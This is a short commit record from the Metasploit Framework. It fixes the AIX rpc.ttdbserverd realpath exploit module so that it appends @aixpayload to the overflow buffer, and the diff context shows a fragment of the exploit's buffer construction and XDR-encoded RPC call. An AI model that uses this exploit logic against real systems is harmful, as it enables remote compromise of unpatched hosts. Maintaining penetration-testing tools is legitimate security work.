Fix the aix/rpc_ttdbserverd_realpath.rb module to use @aixpayload instead of payload.encoded

git-svn-id: file:///home/svn/framework3/trunk@9350 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Ramon de C Valle 2010-05-24 02:06:14 +00:00
parent d31dd35f62
commit db272ef7b5
1 changed files with 1 additions and 1 deletions

View File

@ -268,7 +268,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
buf << "\x7f\xff\xfb\x78" * 1920
buf << payload.encoded
buf << @aixpayload
buf = XDR.encode(buf, 2, 0x78000000, 2, 0x78000000)
print_status('Sending procedure 15 call message...')